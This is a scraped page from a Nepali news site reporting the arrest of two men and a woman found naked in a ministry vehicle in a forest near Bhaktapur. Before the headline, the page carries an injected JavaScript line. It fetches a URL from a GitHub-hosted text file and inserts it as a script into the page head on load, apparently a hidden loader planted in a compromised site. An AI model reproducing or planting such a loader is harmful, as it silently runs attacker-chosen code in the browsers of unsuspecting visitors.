;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); घ्याम्पेडाँडाको जंगल भित्र मन्त्रालयको गाडीमा यौनजन्य कार्य, निर्वस्त्र अवस्थामा भेटीए – जुनेली न्युज
बुधबार, बैशाख ४, २०८२
  • होमपेज
  • घ्याम्पेडाँडाको जंगल भित्र मन्त्रालयको गाडीमा यौनजन्य कार्य, निर्वस्त्र अवस्थामा भेटीए
ट्रेन्डिङ

घ्याम्पेडाँडाको जंगल भित्र मन्त्रालयको गाडीमा यौनजन्य कार्य, निर्वस्त्र अवस्थामा भेटीए

काठमाडौं – केपी शर्मा ओली नेतृत्वको सरकारको महिला, बालबालिका तथा ज्येष्ठ नागरिक मन्त्रालयको सरकारी गाडीभित्र यौनजन्य कार्य गरिरहेको अवस्थामा ३ व्यक्ति पक्राउ परेका छन् ।

नियमित गस्ती गरिरहेको प्रहरी टोलीले गाडीभित्र निर्वस्त्र अवस्थामा महिला र पुरुषलाई देखेपछि नियन्त्रणमा लिएको थियो । गाडी चालक मन्त्रालयकै कर्मचारी रहेको प्रहरीले जनाएको छ ।

यौनजन्य कार्य गरिरहेकै बेला पक्राउ पर्नेमा २ पुरुष र १ महिला रहेका प्रहरीले जनाएको छ ।
बुधवार ११ बजे मध्यराति भक्तपुरको सुर्यविनायक नगरपालिका–७ घ्याम्पेडाँडाको जंगलमा रोकिराखेको गाडीबाट आरोपीहरू रङ्गेहात पक्राउ परेका हुन् ।

प्रदेश ३–०१–००२ झ ५०५२ नम्बरको गाडीबाट पक्राउ गरिएकाहरूलाई नियन्त्रणमा लिएर राखिएको प्रहरीले जनाएको छ ।

 

फेसबुक प्रतिक्रियाहरु